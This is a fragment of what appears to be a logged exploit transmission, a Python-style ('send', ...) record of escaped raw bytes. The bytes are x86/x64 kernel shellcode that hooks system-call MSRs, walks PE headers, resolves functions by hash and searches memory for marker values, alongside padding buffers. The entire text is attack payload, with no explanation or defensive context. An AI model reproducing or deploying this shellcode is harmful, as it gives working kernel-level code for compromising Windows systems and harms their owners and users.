c6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR
\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\r@\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\xc0@\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\
x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\x8b@\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\x8b@<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\xc0@\
\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\x01@\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\
\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 17, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\
\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00
\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\xc0@\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea 
\\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\xc0@\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\
x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\xe9@\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR
\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4